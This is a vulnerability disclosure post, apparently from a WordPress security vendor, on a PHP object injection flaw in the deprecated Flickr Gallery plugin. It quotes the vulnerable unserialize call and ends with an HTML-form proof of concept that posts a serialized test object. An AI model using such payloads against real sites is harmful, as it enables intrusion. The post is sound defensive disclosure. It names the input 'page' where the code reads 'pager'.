02 Oct

Vulnerability Details: PHP Object Injection Vulnerability in Flickr Gallery

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.

Since June we have been doing proactive monitoring of changes made to plugins to try to catch serious vulnerabilities. So far that has lead to identifying a couple of dozen vulnerabilities. For the fourth time it has lead to us identifying a PHP object injection vulnerability being fixed in a plugin, this time in the plugin Flickr Gallery.

Before getting in to the details of that it is worth noting that the description of the plugin was change in the latest version to state “This plugin is deprecated, please remove it from your WordPress install.”

There is no changelog for the plugin and no information that indicates who discovered the vulnerability.

The plugin runs the function init() during init, which occurs when WordPress is loading a page (in the file /flickr-gallery.php):

1121
add_action('init', array('DC_FlickrGallery', 'init'));

In that function, as of version 1.5.2, the function ajax_pagination() would run if the POST input “action” was set to “flickr-gallery-page”:

107
108
} elseif ( $_POST['action'] == 'flickr-gallery-page' ) {
	DC_FlickrGallery::ajax_pagination();

That function will unserialize the value of the POST input “page”, which permits PHP object injection to occur:

174
175
176
function ajax_pagination() {
	global $phpFlickr;
	$pager = unserialize(stripslashes($_POST['pager']));

Version 1.5.3 removes that function and the code in the function init() that would call it.

Proof of Concept

With our plugin for testing for PHP object injection installed and activated, the following proof of concept will cause the message “PHP object injection has occurred.” be shown.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]" method="POST">
<input type="hidden" name="action" value="flickr-gallery-page" />
<input type="hidden" name="pager" value='O:20:"php_object_injection":0:{}' />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>

Leave a Reply

Your email address will not be published. Required fields are marked *